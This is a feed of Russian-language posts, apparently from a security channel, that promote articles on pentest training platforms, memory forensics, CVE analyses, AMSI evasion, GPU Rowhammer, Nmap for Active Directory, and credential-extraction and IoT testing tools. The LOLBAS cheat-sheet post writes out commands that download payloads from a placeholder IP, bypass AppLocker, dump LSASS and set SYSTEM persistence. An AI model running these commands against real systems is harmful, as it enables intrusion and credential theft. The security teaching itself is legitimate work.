Три дня на одной машине — и два месяца потерянной мотивации

Именно столько стоит неправильный выбор стартовой платформы для пентеста. Автор статьи завис на машине «Lame» на HackTheBox, не понимая, почему эксплойт не срабатывает. Причина оказалась простой: он пытался сделать privilege escalation, не зная, что это такое. Фундамент был пропущен.

🔍 Главная ошибка новичков — воспринимать HackTheBox и TryHackMe как конкурентов. Это не два варианта на выбор, а два последовательных этапа. PentesterLab закрывает третью задачу, VulnHub — четвёртую. Спрашивать «какая платформа лучше?» — всё равно что спрашивать «что лучше: учебник или экзамен?». Ответ зависит от того, где вы сейчас.

🎓 TryHackMe — это автошкола. Каждая комната сначала объясняет концепцию, потом даёт задание. Виртуалки запускаются прямо в браузере — не нужно настраивать VPN и ставить Kali. Learning Path «Jr Penetration Tester» проведёт от базовых сетевых концепций до веб-уязвимостей за 60–80 часов практики. Платформа ведёт за руку — и это её главная сила на старте.

Но есть обратная сторона: THM подсказывает каждый шаг. После прохождения Learning Path вы знаете инструменты, но не умеете думать самостоятельно. На реальном проекте подсказок нет.

🔥 HackTheBox — городская дорога без инструктора. Получаете IP-адрес машины. Всё. Никаких инструкций. Именно так выглядит реальный пентест: вот скоуп, вот время — действуйте. Даже машины уровня Easy предполагают, что вы уже умеете провести полное сканирование через nmap -sC -sV -p-, найти эксплойт, адаптировать его и поднять привилегии через linpeas.sh.

Хорошая новость: у HTB есть HTB Academy — структурированный формат с возможностью сдать сертификации CPTS и CBBH. Экзамены практические: никаких тестов с галочками, только hands-on работа и написание профессионального отчёта.

🌐 PentesterLab занимает нишу, которую не покрывает ни одна из двух предыдущих платформ — глубокое понимание механики веб-уязвимостей. Если THM говорит «введите ' OR 1=1 --», то PentesterLab объясняет, почему именно эта строка ломает SQL-запрос, как устроен парсинг на стороне сервера и какие варианты обхода фильтров существуют. Незаменим для тех, кто метит в веб-пентест или bug bounty.

Итого — рабочая последовательность для большинства:

• TryHackMe — фундамент, базовые концепции, первые 60–80 часов
• HTB Academy — структурированное углубление, подготовка к сертификациям
• HackTheBox — самостоятельная работа с реальными машинами
• PentesterLab — специализация по вебу

В полной статье — разбор VulnHub, конкретные машины для первого опыта на каждой платформе и честный ответ на вопрос, какую из них стоит брать платно.

https://codeby.net/threads/hackthebox-vs-tryhackme-vs-pentesterlab-vs-vulnhub-kakuyu-platformu-dlya-pentesta-vybrat-v-2025.92833/

Читать полностью…

<poll>

Читать полностью…

Почему малварь прячется в RAM — и как её оттуда достать

За последний год через одну лабораторию прошло больше двадцати дампов с реальных инцидентов — и во всех случаях малварь жила исключительно в оперативной памяти. Ни одного файла на диске. Классическая дисковая форензика дала бы ноль.

🔍 Fileless-атаки, reflective DLL injection, Cobalt Strike beacon в RWX-регионе легитимного svchost.exe — для антивируса и EDR это выглядит как обычная работа системы. Но в оперативной памяти они оставляют следы, которые никуда не деваются.

Почему RAM важнее диска при реагировании

Образ диска на 250+ ГБ снимается часами. Дамп RAM на 8–32 ГБ — за минуты. Но дело не только в скорости.

Оперативная память хранит то, чего на диске нет в принципе:

• Расшифрованный payload — малварь шифрует себя на диске, но в RAM работает в открытом виде
• Инжектированный код — Process Injection (T1055) файлов не оставляет, только RWX-регионы в чужом адресном пространстве
• Скрытые процессы — руткит выдёргивает процесс из списка, но pool-теги остаются в физической памяти
• Активные C2-соединения — с PID, портами и IP, которые лог файервола мог не записать
• Хэши и билеты Kerberos — прямо в памяти lsass.exe

🛠 Volatility 3: что изменилось

Главная ловушка для тех, кто учился по старым руководствам: в тройке нет --profile. Вместо него — символьные таблицы в формате ISF, которые фреймворк стягивает сам при первом запуске. Не нужно угадывать точный билд Windows — Volatility 3 определяет его автоматически.

Синтаксис стал чище: vol -f dump.raw windows.pslist вместо громоздкого vol.py --profile=Win10x64_18362 pslist. Минорные билды Windows поддерживаются без обновления фреймворка.

⚠️ Ключевой момент про снятие дампа

Дамп снимается до перезагрузки — это очевидно, но на практике именно здесь теряют артефакты. Перезагрузили хост — потеряли всё.

На Windows используется WinPmem: winpmem_mini_x64_rc2.exe output.raw. Сразу после снятия фиксируется контрольная сумма: sha256sum output.raw > output.raw.sha256. Это не формальность — без chain of custody отчёт не примут ни в суде, ни на review у заказчика.

💡 Что реально разделяет pslist и psscan

Большинство руководств перечисляют плагины, не объясняя разницу. pslist идёт по двусвязному списку ядра — руткит может выдернуть оттуда запись. psscan сканирует физическую память по pool-тегам — и находит то, что скрыто. Расхождение между выводами двух плагинов — красный флаг.

Полный workflow расследования: от снятия дампа до IoC для отчёта — в статье.

https://codeby.net/threads/analiz-dampov-pamyati-volatility-3-prakticheskii-workflow-obnaruzheniya-malvari-i-in-yektsii.92825/

Читать полностью…

XSS — это не просто alert(1)
Это уязвимость, которая может привести к краже сессии и полному захвату аккаунта.

Разобрали основные типы XSS и как от них защищаться — в карточках выше

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Читать полностью…

RCE за три шага: как читать CVE advisory и не останавливаться на CVSS-балле

Большинство пентестеров смотрят на новую CVE, запоминают цифру 9.8 и идут дальше. Между тем в тексте advisory уже лежит готовый рецепт эксплойта — если знать, куда смотреть.

🔍 Три фазы для любого PHP/JS-стека:

1. Декомпозиция advisory — читать NVD, GHSA и CISA KEV. Вектор AV:N/AC:L/PR:N/UI:N сразу говорит: pre-auth RCE, максимальный приоритет
2. Patch diffing — коммит из GHSA показывает точку входа. Замена unserialize() или dol_eval() — ваш маяк
3. Цепочка до PoC — CWE-классификация как карта: CWE-502 → gadget chain, CWE-22 → доставка payload

Разобраны CVE-2025-32432 в Craft CMS (CVSS 10.0, CISA KEV) и CVE-2025-55182 в React Server Components — от advisory до шелла.

https://codeby.net/threads/ekspluatatsiya-cve-v-veb-prilozheniyakh-ot-chteniya-advisory-do-rce-za-tri-shaga.92809/

Читать полностью…

Charming Kitten не взламывает системы — они взламывают людей

Недели переписки в WhatsApp, легитимные PDF, приглашения на реальные конференции. И только потом — ссылка. Ни малвари, ни эксплойтов. Просто украденная сессия и полный доступ к Microsoft 365.

APT42 (Charming Kitten, IRGC-IO) работает иначе:

• Фейковые аккаунты журналистов и организаторов конференций выстраивают доверие неделями
• Фишинговые киты перехватывают TOTP-код в реальном времени — MFA не спасает
• Инфраструктура на Google Sites и Cloudflare Workers не триггерит блокировки

Стандартный SOC заточен под вредоносные вложения и подозрительные домены. APT42 не даёт ни того, ни другого — атака идёт на личный Gmail, где корпоративная защита не работает.

Полный kill chain с маппингом на MITRE ATT&CK и примерами детектирования в SIEM:

https://codeby.net/threads/apt42-sotsial-naya-inzheneriya-kak-irgc-khakery-obkhodyat-mfa-i-kradut-uchetnyye-dannyye-bez-malvari.92779/

Читать полностью…

За апрель на форуме вышло 111 материалов. Мы посмотрели Метрику и увидели закономерность, которую не покажет ни один рейтинг «по просмотрам».

Самая читаемая статья месяца, разбор реальных техник применения LLM в атакующих операциях (569 уникальных читателей). Без хайпа про «ИИ заменит пентестера»: конкретные сценарии разведки, генерация payload под редкий таргет, и та самая граница, за которой модель начинает галлюцинировать и портить операцию.
https://codeby.net/threads/ii-v-penteste-real-nyye-tekhniki-ispol-zovaniya-llm-v-atakuyushchikh-operatsiyakh.92644/

Но интереснее смотреть не на трафик, а на глубину. Техническая статья про kernel rootkit в Linux, перехват syscall table, модификация VFS, сокрытие процессов через /proc, собрала «всего» 280 посетителей. А среднее время чтения 1:37. Для kernel-level материала это аномалия: обычно такие вещи смотрят по диагонали и закрывают на второй странице листинга. Те, кто пришёл, сидели с кодом.
https://codeby.net/threads/kernel-rootkit-linux-perekhvat-syscall-table-modifikatsiya-vfs-i-sokrytiye-protsessov-ot-koda-do-detektirovaniya.92640/

То же самое с апрельским Zero-Day в Telegram (ZDI-CAN-30207, CVSS 9.8). 413 посетителей и показатель отказов 11%, читатели уходили только после того, как дочитывали разбор вектора до конца.
https://codeby.net/threads/zero-day-v-telegram-zdi-can-30207-razbor-uyazvimosti-telegram-zero-day-s-otsenkoi-cvss-9-8.92557/

А вот что неожиданно: сравнение OSCP, CEH, eJPT и PNPT, казалось бы, «попсовая» тема про серты, дала средний retention 3:06. Потому что без маркетинга: стоимость, формат экзамена, что реально спрашивают на собеседованиях в РФ, какая серта открывает двери, а какая висит красивым PDF.
https://codeby.net/threads/sertifikatsiya-po-pentestu-oscp-vs-ceh-vs-ejpt-vs-pnpt-chestnoye-sravneniye-ot-praktika.92610/

И единственная статья из топа, которая уже собирает органику из Яндекса (CTR 7.7%), roadmap в пентест от практика. Без «выучите тысячи инструментов», с привязкой к реальным вопросам на собесах в 2026.
https://codeby.net/threads/kak-stat-pentesterom-s-nulya-roadmap-ot-cheloveka-kotoryi-proshel-etot-put.92680/

Что из этого следует: на форум приходят не за «новостями из мира ИБ», а за материалом, который можно применить в понедельник на работе. Кто-то дочитывает про rootkit до последнего листинга, кто-то разбирается с сертификацией под конкретную вакансию, кто-то ищет, как устроен CVSS 9.8 изнутри.

А вам что из апрельского зашло сильнее, и что применили в работе?

Читать полностью…

Комбинация, которая обычно не собирается в одном резюме: сетевик с действующим CCNA, 15 лет практики, удалённый формат по умолчанию и четыре рабочих языка — русский, английский, грузинский, греческий.

На форуме Codeby появился специалист, который закрывает связку «сети — системное администрирование — кибербез — техподдержка» без дробления на четыре разные роли. За плечами — полтора десятка лет в проде и действующие сертификаты Cisco и Microsoft.

Такой профиль имеет смысл присмотреть, если вы:
— держите небольшой интегратор или MSP и не готовы выделять отдельных людей под каждое направление;
— работаете с клиентами на Кипре, в Греции или в Грузии и регулярно упираетесь в языковой барьер;
— ищете внешние руки для сетевой инфраструктуры без найма сетевика в штат;
— закрываете NOC/поддержку по дежурствам и нужен универсал, который не путается в вопросах безопасности.

Специалистов с таким стажем в сетях обычно быстро «поднимают» в архитекторы или замыкают на одного вендора. Универсалы-удалёнщики со свежими сертификатами и несколькими рабочими языками — скорее исключение, чем норма.

Полный профиль с контактами — в теме резюме: https://codeby.net/threads/ishchu-rabotu-v-sfere-it.92754/

Ищете других кандидатов или хотите разместить вакансию — раздел «Карьера в ИБ»: https://codeby.net/forums/kar-yera-v-ib-vakansii-i-proyekty.23/

Читать полностью…

Beacon жив — но через 60 секунд его нет

Initial access получен, C2 поднят. Потом `MsMpEng.exe` режет нагрузку, Script Block Logging пишет каждый чих, AppLocker не даёт запустить ничего. Знакомо?

🔍 Windows-защита — четыре независимых эшелона:
• Статический движок Defender — сигнатуры, ML, PE-фичи
• AMSI — runtime-перехват в адресном пространстве процесса
• ETW — телеметрия для EDR на kernel-level
• AppLocker — application whitelisting на уровне user-mode

Ключевой инсайт: охранник сидит в одной камере с заключённым. amsi.dll загружается в каждую PowerShell-сессию с теми же привилегиями, что и вредоносный код. Классический патчинг AmsiScanBuffer оставляет следы в .text-секции — EDR это видит. Hardware breakpoints через DR0–DR3 обходят сканирование без записи в память.

https://codeby.net/threads/obkhod-windows-defender-i-amsi-prakticheskii-gaid-po-defense-evasion-dlya-red-team.92763/

Читать полностью…

LOLBAS шпаргалка: пост-эксплуатация Windows штатными средствами

EDR снёс инструментарий, но cmd/PowerShell живы — Windows сама несёт всё нужное:

• curl.exe -s -o C:\Temp\f.exe http://IP/f.exe — загрузка файла (Win10 1803+), сигнатуры слабее чем на certutil

• rundll32.exe comsvcs.dll, MiniDump C:\Temp\lsass.dmp full — дамп LSASS без Mimikatz, нужен SeDebugPrivilege

• regsvr32.exe /s /n /u /i:http://IP/payload.sct scrobj.dll — Squiblydoo, обход AppLocker

• msbuild.exe C:\Temp\payload.csproj — компиляция C# inline, обход AppLocker

• schtasks /create /tn "WindowsUpdate" /tr "beacon.exe" /sc onlogon /ru SYSTEM /f — persistence без PowerShell

ATT&CK-маппинг, флаги и ограничения (WDAC, Server Core) — в полной шпаргалке:

https://codeby.net/threads/lolbas-shpargalka-komandy-post-ekspluatatsii-windows-bez-storonnikh-instrumentov.92752/

Читать полностью…

11 строк кода — и ваша сессия уже у атакующего

Ставите расширение-переводчик. Оно честно переводит страницы — и в фоне перехватывает каждый Authorization-заголовок, сливая Bearer-токен через fetch(). Никакого 0-day — только API, который браузер сам отдал.

🔍 Расширение с правом <all_urls> видит весь трафик: банк, корпоративный портал, почту. Обработчик onBeforeSendHeaders получает Cookie, Authorization, X-CSRF-Token до отправки на сервер. Жертва не замечает ничего.

⚠️ 42% вредоносных расширений с 2018 года злоупотребляли webRequest. Manifest V3 вектор не закрыл. Двухфакторка не спасает — расширение внутри периметра доверия браузера.

Полный разбор с PoC-кодом и семплами из Chrome Web Store:

https://codeby.net/threads/kak-brauzernyye-rasshireniya-kradut-dannyye-webrequest-declarativenetrequest-i-tekhniki-perekhvata-trafika.92749/

Читать полностью…

🤖IoTHackBot

Набор специализированных инструментов с интеграцией Claude Code, предназначенных для тестирования на безопасность IoT-устройств, IP-камер и встроенных систем. Он включает в себя как инструменты командной строки, так и рабочие процессы с использованием искусственного интеллекта для комплексной оценки безопасности IoT.

➡️Для установки необходимо установить зависимости, склонировать репозиторий, добавить каталог bin в переменную PATH и для удобного запуска добавить бинарные файлы инструмента в конфигурацию оболочки.

pip install colorama pyserial pexpect requests
git clone https://github.com/BrownFineSecurity/iothackbot.git
cd iothackbot
export PATH="$PATH:$(pwd)/bin"
echo 'export PATH="$PATH:/path/to/iothackbot/bin"' >> ~/.bashrc

🔗Представляет собой следующий набор инструментов
Обнаружение и разведка сети
⏺️wsdiscovery — сканер протокола WS-Discovery для поиска ONVIF-камер и IoT-устройств;
⏺️iotnet — анализатор сетевого трафика IoT для выявления протоколов и уязвимостей;
⏺️netflows — извлечение сетевых потоков с разрешением DNS-имён из pcap-файлов.

Тестирование для конкретного устройства
⏺️onvifscan — сканер безопасности ONVIF-устройств: проверка обхода аутентификации, перебор учётных данных.

Анализ прошивки и файлов
⏺️chipsec — статический анализ прошивок UEFI/BIOS: обнаружение известных руткитов (LoJax, ThinkPwn, HackingTeam), генерация списка EFI-исполняемых файлов с хешами, декодирование структуры прошивки и извлечение NVRAM.

⏺️ffind — продвинутый поиск файлов с определением типов и извлечением файловых систем: определяет типы артефактных файлов, извлекает файловые системы ext2/3/4 и F2FS.

Анализ Android
⏺️apktool — распаковка APK и извлечение ресурсов: декодирование AndroidManifest.xml, извлечение ресурсов, интерфейсов и строк, дизассемблирование в smali-код.

⏺️jadx — декомпиляция APK: преобразование DEX в читаемый Java-код, поиск захардкоженных учётных данных, анализ логики приложения

Доступ к оборудованию и консоли
⏺️picocom — взаимодействие с UART-консолью IoT-устройств: управление загрузчиком, перебор и анализ shell-доступа, извлечение прошивки.

⏺️telnetshell — работа с telnet-shell на IoT-устройствах: проверка неаутентифицированного доступа к shell, сбор информации об устройстве, работа с командами BusyBox.

⛓️‍💥Использование
▶️Проверка безопасности устройств ONVIF.

onvifscan auth http://192.168.1.100
onvifscan brute http://192.168.1.100

▶️Анализ файла PCAP на предмет протоколов Интернета вещей.

iotnet capture.pcap

▶️Извлечение файловых систем из прошивки устройства.

sudo ffind firmware.bin -e

#tools #IoT #pentest

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

Читать полностью…

FortiClient EMS: когда управляющий сервер сам открывает дверь

🔴 4 апреля Fortinet опубликовал advisory FG-IR-26-099 — в субботу пасхального уикенда. Атакующие зафиксированы на honeypot-сетях ещё 31 марта — за четыре дня до раскрытия.

CVE-2026-35616 — архитектурный баг: endpoint API торчит наружу без auth-middleware. CVSS 9.8, pre-auth, никаких учёток, никакого взаимодействия с жертвой. Отправил запрос — получил права администратора EMS.

EMS — центральный узел управления всеми FortiClient-агентами. Захватил его — получил:
• отключение защиты на эндпоинтах (T1562.001)
• развёртывание произвольных пакетов через легитимный канал
• доступ к телеметрии и учётным данным

CISA дала федеральным агентствам 3 дня на патчинг. ~2000 EMS-инстансов до сих пор смотрят в интернет.

https://codeby.net/threads/cve-2026-35616-forticlient-ems-razbor-uyazvimosti-vektor-ataki-i-metody-obnaruzheniya.92711/

Читать полностью…

SMB signing в AD включён по умолчанию? Только на контроллерах домена

Microsoft выставляет SMB signing = required только на DC. На member servers — file, print, application, terminal — по умолчанию стоит negotiate. Это значит: если атакующий перехватит NTLM-хендшейк, подпись можно даунгрейднуть и зарелеить аутентификацию в шару другого хоста через ntlmrelayx. Если перехваченная учётка имеет там админские права — компрометация готова.

🎯 Что проверяет атакующий за три команды nmap:

• -sn по подсети — список живых хостов
• -p 88,389,445,636 — отсев DC от member servers
• --script smb-security-mode — на каких member servers signing в статусе disabled

Три команды — и готовый список целей для NTLM relay.

SMB signing = disabled стабильно встречается на свежих серверах 2025–2026 года, не только на legacy-инфраструктуре. Microsoft не меняет дефолтные политики для member servers, а админы исходят из того, что в современной Windows всё настроено безопасно из коробки. Атакующему это на руку — один Nmap-скан находит все уязвимые хосты сразу.

🔍 В статье — полная шпаргалка Nmap для AD: NSE-скрипты под LDAP/Kerberos/SMB, маппинг на MITRE ATT&CK и gotcha-моменты из практики (например, -sS без sudo молча падает в -sT — скан идёт полным TCP-хендшейком и светится в логах целевой машины).

https://codeby.net/threads/nmap-shpargalka-komandy-dlya-pentesta-active-directory.92733/

Читать полностью…

ИИ не взламывает за вас — но экономит часы рутины

За 8 месяцев на реальных engagement'ах выяснилось: LLM не заменяет пентестера, зато разгребает 3000 строк nmap-вывода за минуты и пишет черновик отчёта, пока ты пьёшь кофе.

🔍 Главная проблема обзоров «AI для пентеста» — в одну кучу валят разные вещи. Рынок делится на 7 сегментов: от AI-ассистентов внутри Burp до автономных black-box движков. Сравнивать PentestGPT с Pentera — всё равно что Burp Repeater с Nessus.

⚡ Где LLM реально ускоряет:
• Анализ разведки — промпт к выводу subfinder/amass находит «забытые» Jenkins с дефолтными кредами
• Генерация payload'ов — Unicode normalization abuse против WAF вместо заблокированных UNION-векторов
• Черновики отчётов — стартовая точка, не финал

🛡 Облачные LLM — только с NDA. Для чувствительных проектов — ollama или локальный routing.

https://codeby.net/threads/ii-dlya-pentesta-v-2026-chto-real-no-rabotayet-na-engagementakh-a-chto-marketing.92721/

Читать полностью…

Видеокарта как вектор атаки: почему GPU Rowhammer меняет модель угроз

Десять лет Rowhammer был исключительно про оперативную память CPU. DDR3, DDR4, DDR5 — бесконечная гонка между атакующими и производителями памяти. Но видеопамять GPU всё это время считалась безопасной: ну сломал точность нейросети с 80% до 60% — и что с того?

🔬 Три препринта 2025–2026 годов — GDDRHammer, GeForge и GPUBreach — переводят разговор в другую плоскость. Речь уже не о деградации модели, а о полноценной эскалации привилегий до root через аппаратный сбой в GDDR6.

Физика та же: ячейки DRAM расположены настолько плотно, что многократное обращение к одной строке создаёт электрические помехи в соседних. Конденсаторы теряют заряд, биты переключаются — 0 становится 1. Впервые эффект задокументировали в 2014 году на DDR3, и с тех пор исследователи научились через bit flip рутить Android, красть 2048-битные криптоключи и обходить ECC. Но всё это касалось только CPU-памяти.

⚡️ Что умеют три новые атаки:

• GDDRHammer — 129 bit flip на банк в NVIDIA RTX A6000. Атака модифицирует таблицу страниц последнего уровня и перенаправляет виртуальные адреса GPU на физическую память CPU через PCIe. Требует отключённого IOMMU.

• GeForge — 1171 bit flip на RTX 3060, атакует каталог страниц целиком. Результат: открытый root shell на хосте. Тоже нужен отключённый IOMMU.

• GPUBreach — и вот здесь интереснее. По данным исследователей из University of Toronto, атака работает даже с включённым IOMMU. Вместо прямого маппинга GPU-адресов на CPU-память — что IOMMU запрещает — GPUBreach повреждает метаданные в буферах, к которым GPU уже имеет легитимный доступ. Затем эксплуатируются memory-safety баги в самом драйвере NVIDIA, который работает с привилегиями ядра. IOMMU не помогает: записи происходят на стороне CPU, а не GPU.

🎯 Почему это важно для пентестеров? Облачные GPU-окружения — это мультитенантная среда, где несколько клиентов делят один физический ускоритель. Если атака позволяет выйти из GPU-контекста в память CPU хоста — это уже не академический сценарий. Стоит уточнить: препринты пока не прошли независимую верификацию, и числа основаны на вторичных источниках. Но сама возможность обхода IOMMU через драйвер уже меняет то, как стоит думать о безопасности GPU-инфраструктуры.

📖 Полный разбор kill chain каждой атаки, детали memory massaging и что можно воспроизвести в лаборатории — в статье на форуме.

https://codeby.net/threads/gpubreach-rowhammer-ataka-gpu-s-eskalatsiyei-privilegii-do-root-polnyi-razbor-kill-chain.92830/

Читать полностью…

Пасхальная суббота, взломанная инфраструктура и CVE без патча

31 марта 2026 года сенсоры watchTowr зафиксировали активную эксплуатацию уязвимости, для которой не существовало ни advisory, ни патча. Четырьмя днями позже, в пасхальную субботу, Fortinet выкатила бюллетень. К тому моменту атакующие уже сидели внутри.

🎯 Почему праздники? SOC работает в полсилы, дежурный смотрит в потолок, а окно между компрометацией и детектом растягивается с часов до дней. CEO watchTowr сказал об этом прямо: атакующие давно поняли, что праздники — лучшее время для работы.

CVE-2026-35616 — pre-auth RCE с CVSS 9.8 в FortiClient EMS версий 7.4.5–7.4.6. Не академическая строчка из бюллетеня, а рабочий zero-day, который эксплуатировался до публикации патча.

🔍 Что такое FortiClient EMS и почему это главная цель?

FortiClient EMS — не просто сервер мониторинга. Это центральный management plane всей endpoint-инфраструктуры Fortinet. Через него проходит всё: VPN-политики, compliance-проверки, телеметрия с агентов, интеграция с FortiSandbox и FortiGate.

Компрометация EMS на red team — это джекпот. Атакующий получает:

• управление защитой на всех endpoint'ах
• возможность раскатывать произвольные пакеты через легитимный push-механизм
• доступ к телеметрии с VPN-токенами
• манипуляцию FortiSandbox-интеграцией

По данным Shadowserver, около 2000 экземпляров FortiClient EMS торчат в интернет напрямую — вопреки всем рекомендациям Fortinet. Но кого когда останавливали рекомендации.

⚙️ Почему баг вообще работает?

Вектор CVSS:3.1/AV:N/AC:L/PR:N/UI:N — это значит: удалённо, без сложных условий, без учётки, без каких-либо действий со стороны жертвы. Один запрос — один результат.

Корневая причина — отсутствие auth-middleware на конкретных API-эндпоинтах. Механизм аутентификации не взламывается и не обходится через инъекцию — он просто не применяется к определённым запросам. Разработчики добавили новый route, забыли навесить auth-декоратор — классика жанра. Такой паттерн встречается при аудите корпоративных REST API регулярно.

Отдельный момент: в русскоязычных источниках гуляет ошибка — якобы версия 7.4.6 закрывает уязвимость. Это неверно. По NVD, уязвимы обе версии — и 7.4.5, и 7.4.6. Исправление только через обновление до 7.4.7.

🔗 Параллельный вектор

CVE-2026-35616 — не изолированный случай. CVE-2026-21643 — SQL-инъекция в версии 7.4.4 с тем же CVSS 9.8 и идентичным вектором. Два разных класса уязвимостей, один и тот же критический уровень, одна и та же цель. FortiClient EMS явно требует более глубокого security-аудита.

Полная механика эксплуатации — от разведки и API bypass до lateral movement через Fortinet-инфраструктуру — в статье на форуме.

https://codeby.net/threads/cve-2026-35616-ekspluatatsiya-uyazvimosti-forticlient-ems-ot-api-bypass-do-zakhvata-fortinet-infrastruktury.92827/

Читать полностью…

Почему Nmap без kill chain — просто сканер портов

Каждый раз, когда я веду воркшоп для начинающих, первый вопрос всегда один: «Какие инструменты установить?» И каждый раз я отвечаю встречным: «А на каком этапе атаки ты сейчас находишься?»

Разница между джуном и опытным пентестером не в количестве утилит, а в понимании — зачем конкретный инструмент запускается именно сейчас. Nmap без контекста — просто сканер портов. Nmap в начале kill chain — разведывательный модуль, от которого зависит весь дальнейший вектор атаки.

🔍 Большинство гайдов по инструментам хакера строятся как плоский список: вот Nmap, вот Metasploit, вот Wireshark — пользуйтесь. Это примерно как дать человеку скальпель, пилу и зажим и сказать: «Теперь ты хирург». Без понимания последовательности инструменты бесполезны.

В реальном пентесте каждый шаг определяет следующий. Сначала разведка — выясняешь, что вообще живёт на периметре. Затем анализ поверхности атаки — ищешь веб-приложения, открытые сервисы, точки входа. Потом эксплуатация — превращаешь найденную уязвимость в доступ. После — повышение привилегий и перемещение по сети.

⚡ MITRE ATT&CK формализует эту логику. Каждой фазе соответствуют конкретные техники. Запускаешь Nmap — выполняешь Network Service Discovery (T1046). Пробиваешь веб-форму через SQLmap — Exploit Public-Facing Application (T1190). Перебираешь пароли Hydra — Brute Force (T1110). Такой подход делает пентест системным и позволяет писать отчёты, которые заказчик реально может использовать.

🛠 Что конкретно даёт привязка к kill chain? Возьмём типичный вывод nmap -sV -sC -p- 10.10.10.100:

• Порт 22 с OpenSSH 7.9 — проверяем на известные CVE, но скорее всего идём через веб
• MySQL на порту 3306 торчит наружу — потенциальный вектор брутфорса (зачем он вообще открыт на периметре?)
• Apache Tomcat 9.0.30 на 8080 — горячая находка: старые версии часто содержат дыры в менеджере деплоя

Это не просто список открытых портов. Это карта решений: куда идти дальше, что фаззить, что брутить, где искать CVE.

🎯 Опытные пентестеры при работе с десятками хостов комбинируют инструменты: Masscan делает быстрое первичное сканирование всех портов, а Nmap с флагом -sV точечно добивает найденное. NSE-скрипты добавляют глубину: smb-vuln-ms17-010 проверяет EternalBlue, ssl-heartbleed обнаруживает Heartbleed, а http-enum находит стандартные директории веб-серверов за один проход.

Это лишь первая фаза из десяти. Дальше — Burp Suite, SQLmap, Metasploit, Hydra, Hashcat и другие инструменты, каждый из которых привязан к конкретному этапу атаки. Читай полный разбор в статье 👇

https://codeby.net/threads/instrumenty-pentestera-top-10-s-real-nymi-primerami-v-kazhdoi-faze-ataki.92812/

Читать полностью…

Альфа-Банк собирает хакеров на соревнования — среди лучших спецов разыгрывают 3 100 000 рублей. В этот раз участвовать могут и школьники — победителям этого трека банк оплатит поездку на научную конференцию.

Такие турниры — хорошая строчка в резюме: участие поможет при трудоустройстве. Соревноваться можно из любой точки мира, нужно только зарегистрироваться до 25 апреля.

Регистрация

Читать полностью…

Один POST-запрос — и ты root. Без пароля.

🔓 Два command injection в роутере Totolink A7100RU работают без аутентификации. HTTP POST к /cgi-bin/cstecgi.cgi — и атакующий получает полный контроль. PoC уже на GitHub, патча нет.

cstecgi.cgi парсит JSON, берёт значение параметра и без проверок скармливает его в system() через sprintf(). Параметр ttyEnable, задуманный как булевый флаг, принимает строку любой длины с shell-метасимволами.

⚙️ В статье:
• Распаковка прошивки через binwalk и анализ MIPS-бинарника в Ghidra
• Формирование запросов для CVE-2026-6112 и CVE-2026-6113
• Готовые Suricata-правила для детекции

MITRE ATT&CK, CVSS 4.0 и разбор CWE-77/CWE-78 на реальном коде — в статье:

https://codeby.net/threads/cve-2026-6112-i-cve-2026-6113-uyazvimost-command-injection-v-totolink-a7100ru-ot-analiza-proshivki-do-detektsii.92788/

Читать полностью…

Непонятный blob в cookie → reverse shell за 30 секунд

За этой «магией» — конкретная механика, которую важно понять, чтобы не застрять в поиске gadget chain на три вечера.

🔍 Как распознать формат в трафике:
• Java: Base64 начинается с rO0AB (байты ac ed 00 05)
• PHP: маркеры O:, a:, s: — читаются глазами
• Python pickle: бинарный поток с байтом \x80

⚙️ Ключевой инсайт: уязвимость — не в библиотеке вроде Apache Commons Collections, а в приложении, которое скармливает недоверенные данные в readObject(). Библиотека в classpath — не дыра. Дыра — когда пользовательский ввод до неё добирается.

Дальше: как подобрать gadget chain через ysoserial и phpggc, какие CVE эксплуатировать на WebLogic и PHP-фреймворках, и как строить цепочки вручную.

https://codeby.net/threads/uyazvimosti-deserializatsii-ekspluatatsiya-cherez-ysoserial-phpggc-i-postroyeniye-gadget-chain.92777/

Читать полностью…

Burp Suite + OWASP Top 10: какой плагин ставить и зачем

Один extension на каждую категорию OWASP:

• A01 Broken Access Control → Autorize: вставил cookie низкопривилегированного юзера, браузишь как админ — красный «Bypassed!» = готовый IDOR
• A03 Injection → ActiveScan++: добавляет XXE, SSTI, улучшенный SQLi
• A04 Insecure Design → Turbo Intruder: race conditions на промокодах — тысячи req/sec
• A07 Auth Failures → JWT Editor: атаки alg:none, weak secret, key confusion из Repeater
• A10 SSRF → Collaborator Everywhere: браузишь приложение, extension инжектирует заголовки и ловит out-of-band callbacks

Плюс Param Miner (до 65 000 параметров за запрос) и Retire.js для уязвимых JS-библиотек.

https://codeby.net/threads/burp-suite-extensions-shpargalka-po-owasp-top-10-2025-kakoi-plagin-stavit-i-zachem.92768/

Читать полностью…

👥VMkatz

Инструмент для извлечения учетных данных Windows (хэши NTLM, мастер-ключи DPAPI, билеты Kerberos, кэшированные учетные данные домена, секреты LSA, NTDS.dit, ключи BitLocker) непосредственно из снимков памяти и виртуальных дисков на сетевом хранилище, в гипервизоре и везде, где находятся файлы виртуальной машины.

Для работы используется один статический двоичный файл размером ~3 МБ. Загрузите его на хост ESXi, узел Proxmox или в сетевое хранилище. Укажите .vmsn или .vmdk или целую папку с виртуальными машинами. Получите учетные данные, а не образы дисков.

⬇️Установка
Клонируем репозиторий, компилируем. Двоичный файл будет лежать по пути target/x86_64-unknown-linux-musl/release.

git clone https://github.com/nikaiw/VMkatz.git
cd VMkatz
cargo build --release --target x86_64-unknown-linux-musl
cd target/x86_64-unknown-linux-musl/release
./vmkatz —help

Поддерживаемые входные данные
📉Снимки VMware в формате .vmsn + .vmem;
📉Встроенные снимки VMware в формате .vmsn (без .vmem);
📉Сохранённые состояния VirtualBox в формате .sav;
📉Состояния savevm QEMU/KVM;
📉ELF core dump’ы QEMU/KVM в формате .elf;
📉Сохранённые состояния Hyper-V в формате .vmrs;
📉Виртуальные диски VMware в формате .vmdk;
📉Виртуальные диски VirtualBox в формате .vdi;
📉Виртуальные диски QEMU/KVM в формате .qcow2;
📉Виртуальные диски Hyper-V в формате .vhdx, .vhd;
📉RAW SCSI-устройства VMFS-5/6 в формате /dev/disks/...;
📉Сырые файлы реестра Windows в формате SAM, SYSTEM, SECURITY;
📉Сырой файл NTDS.dit в формате ntds.dit + SYSTEM;
🖱Минидамп процесса LSASS в формате .dmp.

Использование
1️⃣Извлечение учетных данных LSASS из снимка VMware.

./vmkatz snapshot.vmsn

2️⃣Указание пути до виртуальной директории с целью поиска необходимых файлов.

./vmkatz /path/to/vm-directory/

3️⃣Экспорт BitLocker FVEK.

